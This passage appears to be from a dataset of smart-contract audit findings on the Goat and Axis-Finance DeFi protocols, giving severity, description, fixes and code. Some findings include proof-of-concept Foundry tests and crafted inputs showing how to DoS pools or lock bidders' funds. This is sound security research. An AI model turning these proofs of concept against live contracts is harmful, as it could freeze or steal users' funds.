(localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n",I think that the mechanism for identifying should be improved.,Legitimate pools can be taken over unfairly.,"```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n" +The router is not compatible with fee on transfers tokens,medium,"The router is not compatible with fee on transfers tokens.\\nLet's take as example the removeLiquidity function:\\n```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n\\nIt does the following:\\nTransfers liquidity tokens `to` the pair.\\nBurns the liquidity tokens and sends WETH and TOKEN `to` the recipient `to`.\\nEnsures enough WETH has been transferred.\\nEnsures enough TOKEN has been transferred.\\nAt point `4` the router doesn't account for the fee paid to transfer TOKEN. The recipient didn't actually receive `amountToken`, but slightly less because a fee has been charged.\\nAnother interesting example is the removeLiquidityETH which first burns the liquidity and transfers the tokens to the router itself, and then from the router the tokens are transferred to the recipient. This will charge double the fees.\\nThis is just two examples to highlight the fact that these kind of tokens are not supported, but the other functions in the router have similar issues that can cause all sorts of trouble including reverts and loss of funds.","Add functionality to the router to support fee on transfer tokens, a good example of where this is correctly implememented is the Uniswap Router02.",The router is not compatible with fee on transfers tokens.,"```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n" +It's possible to create pairs that cannot be taken over,medium,"It's possible to create pairs that cannot be taken over and DOS a pair forever.\\nA pair is created by calling createPair() which takes the initial parameters of the pair as inputs but the initial parameters are never verified, which makes it possible for an attacker to create a token pair that's impossible to recover via takeOverPool().\\nThere's more ways to create a pair that cannot be taken over, a simple example is to set all of the initial parameters to the maximum possible value:\\n```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n\\nThis will make takeOverPool() revert for overflow on the internal call to _tokenAmountsForLiquidityBootstrap:\\n```\\nuint256 k = virtualEth * initialTokenMatch;\\n tokenAmtForAmm = (k * bootstrapEth) / (totalEth * totalEth);\\n```\\n\\nHere `virtualEth`, `initialTokenMatch` and `bootstrapEth` are all setted to `type(uint112).max`. The multiplication `virtualEth` * `initialTokenMatch` * `bootstrapEth` performed to calculate `tokenAmtForAmm` will revert for overflow because `2^112 * 2^112 * 2^112 = 2^336` which is bigger than `2^256`.",Validate a pair initial parameters and mint liquidity on pool creation.,Creation of new pairs can be DOSed forever.,```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n +[M-1],high,"Seller's funds may remain locked in the protocol, because of revert on 0 transfer tokens. In the README.md file is stated that the protocol uses every token with ERC20 Metadata and decimals between 6-18, which includes some revert on 0 transfer tokens, so this should be considered as valid issue!\\nin the `AuctionHouse::claimProceeds()` function there is the following block of code:\\n```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n\\nSince the batch auctions must be prefunded so `routing.funding` shouldn't be zero unless all the tokens were sent in settle, in which case `payoutSent` will equal `sold_`. From this we make the conclusion that it is possible for `prefundingRefund` to be equal to 0. This means if the `routing.baseToken` is a revert on 0 transfer token the seller will never be able to get the `quoteToken` he should get from the auction.","Check if the `prefundingRefund > 0` like this:\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n // Validation\\n _isLotValid(lotId_);\\n\\n // Call auction module to validate and update data\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // Load data for the lot\\n Routing storage routing = lotRouting[lotId_];\\n\\n // Calculate the referrer and protocol fees for the amount in\\n // Fees are not allocated until the user claims their payout so that we don't have to iterate through them here\\n // If a referrer is not set, that portion of the fee defaults to the protocol\\n uint96 totalInLessFees;\\n {\\n (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n\\n // Send payment in bulk to the address dictated by the callbacks address\\n // If the callbacks contract is configured to receive quote tokens, send the quote tokens to the callbacks contract and call the onClaimProceeds callback\\n // If not, send the quote tokens to the seller and call the onClaimProceeds callback\\n _sendPayment(routing.seller, totalInLessFees, routing.quoteToken, routing.callbacks);\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding // Add the line below\\n payoutSent_ - sold_;\\n// Add the line below\\n// Add the line below\\n if(prefundingRefund > 0) { \\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n// Add the line below\\n// Add the line below\\n }\\n \\n\\n // Call the onClaimProceeds callback\\n Callbacks.onClaimProceeds(\\n routing.callbacks, lotId_, totalInLessFees, prefundingRefund, callbackData_\\n );\\n }\\n```\\n",The seller's funds remain locked in the system and he will never be able to get them back.,"```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n" +Module's gas yield can never be claimed and all yield will be lost,high,"Module's gas yield can never be claimed\\nThe protocol is meant to be deployed on blast, meaning that the gas and ether balance accrue yield.\\nBy default these yield settings for both ETH and GAS yields are set to VOID as default, meaning that unless we configure the yield mode to claimable, we will be unable to recieve the yield. The protocol never sets gas to claimable for the modules, and the governor of the contract is the auction house, the auction house also does not implement any function to set the modules gas yield to claimable.\\n```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n\\nThe constructor of both BlastLinearVesting and BlastEMPAM set the auction house here `BlastGas(auctionHouse_)` if we look at this contract we can observe the above.\\nBlastGas.sol\\n```\\n constructor(address parent_) {\\n // Configure governor to claim gas fees\\n IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n }\\n```\\n\\nAs we can see above, the governor is set in constructor, but we never set gas to claimable. Gas yield mode will be in its default mode which is VOID, the modules will not accue gas yields. Since these modules never set gas yield mode to claimable, the auction house cannot claim any gas yield for either of the contracts. Additionally the auction house includes no function to configure yield mode, the auction house contract only has a function to claim the gas yield but this will revert since the yield mode for these module contracts will be VOID.","change the following in BlastGas contract, this will set the gas yield of the modules to claimable in the constructor and allowing the auction house to claim gas yield.\\n```\\ninterface IBlast {\\n function configureGovernor(address governor_) external;\\n function configureClaimableGas() external; \\n}\\n\\nabstract contract BlastGas {\\n // ========== CONSTRUCTOR ========== //\\n\\n constructor(address parent_) {\\n // Configure governor to claim gas fees\\n IBlast(0x4300000000000000000000000000000000000002).configureClaimableGas();\\n IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n }\\n}\\n```\\n",Gas yields will never acrue and the yield will forever be lost,```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n +Auction creators have the ability to lock bidders' funds.,high,"`Auction creators` have the ability to cancel an `auction` before it starts. However, once the `auction` begins, they should not be allowed to cancel it. During the `auction`, `bidders` can place `bids` and send `quote` tokens to the `auction` house. After the `auction` concludes, `bidders` can either receive `base` tokens or retrieve their `quote` tokens. Unfortunately, batch `auction` creators can cancel an `auction` when it ends. This means that `auction` creators can cancel their `auctions` if they anticipate `losses`. This should not be allowed. The significant risk is that `bidders' funds` could become locked in the `auction` house.\\n`Auction creators` can not cancel an `auction` once it concludes.\\n```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n\\nThey also can not cancel it while it is active.\\n```\\nfunction _cancelAuction(uint96 lotId_) internal override {\\n _revertIfLotActive(lotId_);\\n\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nWhen the `block.timestamp` aligns with the `conclusion` time of the `auction`, we can bypass these checks.\\n```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\nfunction _revertIfLotActive(uint96 lotId_) internal view override {\\n if (\\n auctionData[lotId_].status == Auction.Status.Created\\n && lotData[lotId_].start <= block.timestamp\\n && lotData[lotId_].conclusion > block.timestamp\\n ) revert Auction_WrongState(lotId_);\\n}\\n```\\n\\nSo `Auction creators` can cancel an `auction` when it concludes. Then the `capacity` becomes `0` and the `auction` status transitions to `Claimed`.\\n`Bidders` can not `refund` their `bids`.\\n```\\nfunction refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n) external override onlyInternal returns (uint96 refund) {\\n _revertIfLotConcluded(lotId_);\\n}\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n\\nThe only way for `bidders` to reclaim their tokens is by calling the `claimBids` function. However, `bidders` can only claim `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n) {\\n _revertIfLotNotSettled(lotId_);\\n}\\n```\\n\\nTo `settle` the `auction`, the `auction` status should be `Decrypted`. This requires submitting the `private key`. The `auction` creator can not submit the `private key` or submit it without decrypting any `bids` by calling `submitPrivateKey(lotId, privateKey, 0)`. Then nobody can decrypt the `bids` using the `decryptAndSortBids` function which always reverts.\\n```\\nfunction decryptAndSortBids(uint96 lotId_, uint64 num_) external {\\n if (\\n auctionData[lotId_].status != Auction.Status.Created // @audit, here\\n || auctionData[lotId_].privateKey == 0\\n ) {\\n revert Auction_WrongState(lotId_);\\n }\\n\\n _decryptAndSortBids(lotId_, num_);\\n}\\n```\\n\\nAs a result, the `auction status` remains unchanged, preventing it from transitioning to `Settled`. This leaves the `bidders'` `quote` tokens locked in the `auction house`.\\nPlease add below test to the `test/modules/Auction/cancel.t.sol`.\\n```\\nfunction test_cancel() external whenLotIsCreated {\\n Auction.Lot memory lot = _mockAuctionModule.getLot(_lotId);\\n\\n console2.log(""lot.conclusion before ==> "", lot.conclusion);\\n console2.log(""block.timestamp before ==> "", block.timestamp);\\n console2.log(""isLive ==> "", _mockAuctionModule.isLive(_lotId));\\n\\n vm.warp(lot.conclusion - block.timestamp + 1);\\n console2.log(""lot.conclusion after ==> "", lot.conclusion);\\n console2.log(""block.timestamp after ==> "", block.timestamp);\\n console2.log(""isLive ==> "", _mockAuctionModule.isLive(_lotId));\\n\\n vm.prank(address(_auctionHouse));\\n _mockAuctionModule.cancelAuction(_lotId);\\n}\\n```\\n\\nThe log is\\n```\\nlot.conclusion before ==> 86401\\nblock.timestamp before ==> 1\\nisLive ==> true\\nlot.conclusion after ==> 86401\\nblock.timestamp after ==> 86401\\nisLive ==> false\\n```\\n","```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n- if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n+ if (lotData[lotId_].conclusion <= uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n",Users' funds can be locked.,```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n +Bidders can not claim their bids if the auction creator claims the proceeds.,high,"Before the batch `auction` begins, the `auction` creator should `prefund` `base` tokens to the `auction` house. During the `auction`, `bidders` transfer `quote` tokens to the `auction` house. After the `auction` settles,\\n`Bidders` can claim their `bids` and either to receive `base` tokens or `retrieve` their `quote` tokens.\\nThe `auction creator` can receive the `quote` tokens and `retrieve` the remaining `base` tokens.\\nThere is no specific order for these two operations.\\nHowever, if the `auction creator` claims the `proceeds`, `bidders` can not claim their `bids` anymore. Consequently, their `funds` will remain locked in the `auction house`.\\nWhen the `auction creator` claims `Proceeds`, the `auction status` changes to `Claimed`.\\n```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nOnce the `auction status` has transitioned to `Claimed`, there is indeed no way to change it back to `Settled`.\\nHowever, `bidders` can only claim their `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n)\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n{\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_); // @audit, here\\n\\n return _claimBids(lotId_, bidIds_);\\n}\\n```\\n\\nPlease add below test to the `test/modules/auctions/claimBids.t.sol`.\\n```\\nfunction test_claimProceeds_before_claimBids()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT_UNSUCCESSFUL, _BID_AMOUNT_OUT_UNSUCCESSFUL)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n uint64 bidId = 1;\\n\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = bidId;\\n\\n // Call the function\\n vm.prank(address(_auctionHouse));\\n _module.claimProceeds(_lotId);\\n\\n\\n bytes memory err = abi.encodeWithSelector(EncryptedMarginalPriceAuctionModule.Auction_WrongState.selector, _lotId);\\n vm.expectRevert(err);\\n vm.prank(address(_auctionHouse));\\n _module.claimBids(_lotId, bidIds);\\n}\\n```\\n",Allow `bidders` to claim their `bids` even when the `auction status` is `Claimed`.,Users' funds could be locked.,"```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n" +Bidders' funds may become locked due to inconsistent price order checks in MaxPriorityQueue and the _claimBid function.,high,"In the `MaxPriorityQueue`, `bids` are ordered by decreasing `price`. We calculate the `marginal price`, `marginal bid ID`, and determine the `auction winners`. When a `bidder` wants to claim, we verify that the `bid price` of this `bidder` exceeds the `marginal price`. However, there's minor inconsistency: certain `bids` may have `marginal price` and a smaller `bid ID` than `marginal bid ID` and they are not actually `winners`. As a result, the `auction winners` and these `bidders` can receive `base` tokens. However, there is a finite supply of `base` tokens for `auction winners`. Early `bidders` who claim can receive `base` tokens, but the last `bidders` can not.\\nThe comparison for the order of `bids` in the `MaxPriorityQueue` is as follow: if `q1 * b2 < q2 * b1` then `bid (q2, b2)` takes precedence over `bid (q1, b1)`.\\n```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n\\nAnd in the `_calimBid` function, the `price` is checked directly as follow: if q * 10 ** baseDecimal / b >= marginal `price`, then this `bid` can be claimed.\\n```\\nfunction _claimBid(\\n uint96 lotId_,\\n uint64 bidId_\\n) internal returns (BidClaim memory bidClaim, bytes memory auctionOutput_) {\\n uint96 price = uint96(\\n bidData.minAmountOut == 0\\n ? 0 // TODO technically minAmountOut == 0 should be an infinite price, but need to check that later. Need to be careful we don't introduce a way to claim a bid when we set marginalPrice to type(uint96).max when it cannot be settled.\\n : Math.mulDivUp(uint256(bidData.amount), baseScale, uint256(bidData.minAmountOut))\\n );\\n uint96 marginalPrice = auctionData[lotId_].marginalPrice;\\n if (\\n price > marginalPrice\\n || (price == marginalPrice && bidId_ <= auctionData[lotId_].marginalBidId)\\n ) { }\\n}\\n```\\n\\nThe issue is that a `bid` with the `marginal price` might being placed after marginal `bid` in the `MaxPriorityQueue` due to rounding.\\n```\\nq1 * b2 < q2 * b1, but mulDivUp(q1, 10 ** baseDecimal, b1) = mulDivUp(q2, 10 ** baseDecimal, b2)\\n```\\n\\nLet me take an example. The `capacity` is `10e18` and there are `6 bids` ((4e18 + 1, 2e18) for first `bidder`, `(4e18 + 2, 2e18)` for the other `bidders`. The order in the `MaxPriorityQueue` is `(2, 3, 4, 5, `6`, 1)`. The `marginal bid ID` is `6`. The `marginal price` is `2e18` + 1. The `auction winners` are `(2, 3, 4, 5, 6)`. However, `bidder` 1 can also claim because it's `price` matches the `marginal price` and it has the smallest `bid ID`. There are only `10e18` `base` tokens, but all `6 bidders` require `2e18` `base` tokens. As a result, at least one `bidder` won't be able to claim `base` tokens, and his `quote` tokens will remain locked in the `auction house`.\\nThe Log is\\n```\\nmarginal price ==> 2000000000000000001\\nmarginal bid id ==> 6\\n\\npaid to bid 1 ==> 4000000000000000001\\npayout to bid 1 ==> 1999999999999999999\\n*****\\npaid to bid 2 ==> 4000000000000000002\\npayout to bid 2 ==> 2000000000000000000\\n*****\\npaid to bid 3 ==> 4000000000000000002\\npayout to bid 3 ==> 2000000000000000000\\n*****\\npaid to bid 4 ==> 4000000000000000002\\npayout to bid 4 ==> 2000000000000000000\\n*****\\npaid to bid 5 ==> 4000000000000000002\\npayout to bid 5 ==> 2000000000000000000\\n*****\\npaid to bid 6 ==> 4000000000000000002\\npayout to bid 6 ==> 2000000000000000000\\n```\\n\\nPlease add below test to the `test/modules/auctions/EMPA/claimBids.t.sol`\\n```\\nfunction test_claim_nonClaimable_bid()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(4e18 + 1, 2e18) // bidId = 1\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 2\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 3\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 4\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 5\\n givenBidIsCreated(4e18 + 2, 2e18) // bidId = 6\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n EncryptedMarginalPriceAuctionModule.AuctionData memory auctionData = _getAuctionData(_lotId);\\n\\n console2.log('marginal price ==> ', auctionData.marginalPrice);\\n console2.log('marginal bid id ==> ', auctionData.marginalBidId);\\n console2.log('');\\n\\n for (uint64 i; i < 6; i ++) {\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = i + 1;\\n vm.prank(address(_auctionHouse));\\n (Auction.BidClaim[] memory bidClaims,) = _module.claimBids(_lotId, bidIds);\\n Auction.BidClaim memory bidClaim = bidClaims[0];\\n if (i > 0) {\\n console2.log('*****');\\n }\\n console2.log('paid to bid ', i + 1, ' ==> ', bidClaim.paid);\\n console2.log('payout to bid ', i + 1, ' ==> ', bidClaim.payout);\\n }\\n}\\n```\\n","In the `MaxPriorityQueue`, we should check the price: `Math.mulDivUp(q, 10 ** baseDecimal, b)`.",,"```\\nfunction _isLess(Queue storage self, uint256 i, uint256 j) private view returns (bool) {\\n uint64 iId = self.bidIdList[i];\\n uint64 jId = self.bidIdList[j];\\n Bid memory bidI = self.idToBidMap[iId];\\n Bid memory bidJ = self.idToBidMap[jId];\\n uint256 relI = uint256(bidI.amountIn) * uint256(bidJ.minAmountOut);\\n uint256 relJ = uint256(bidJ.amountIn) * uint256(bidI.minAmountOut);\\n if (relI == relJ) {\\n return iId > jId;\\n }\\n return relI < relJ;\\n}\\n```\\n" +"Overflow in curate() function, results in permanently stuck funds",high,"The `Axis-Finance` protocol has a curate() function that can be used to set a certain fee to a curator set by the seller for a certain auction. Typically, a curator is providing some service to an auction seller to help the sale succeed. This could be doing diligence on the project and `vouching` for them, or something simpler, such as listing the auction on a popular interface. A lot of memecoins have a big supply in the trillions, for example SHIBA INU has a total supply of nearly 1000 trillion tokens and each token has 18 decimals. With a lot of new memecoins emerging every day due to the favorable bullish conditions and having supply in the trillions, it is safe to assume that such protocols will interact with the `Axis-Finance` protocol. Creating auctions for big amounts, and promising big fees to some celebrities or influencers to promote their project. The funding parameter in the Routing struct is of type `uint96`\\n```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n\\nThe max amount of tokens with 18 decimals a `uint96` variable can hold is around 80 billion. The problem arises in the curate() function, If the auction is prefunded, which all batch auctions are( a normal FPAM auction can also be prefunded), and the amount of prefunded tokens is big enough, close to 80 billion tokens with 18 decimals, and the curator fee is for example 7.5%, when the `curatorFeePayout` is added to the current funding, the funding will overflow.\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nGist After following the steps in the above mentioned gist, add the following test to the `AuditorTests.t.sol`\\n```\\nfunction test_CuratorFeeOverflow() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = """";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, 100_000_000_000e18);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18),\\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: 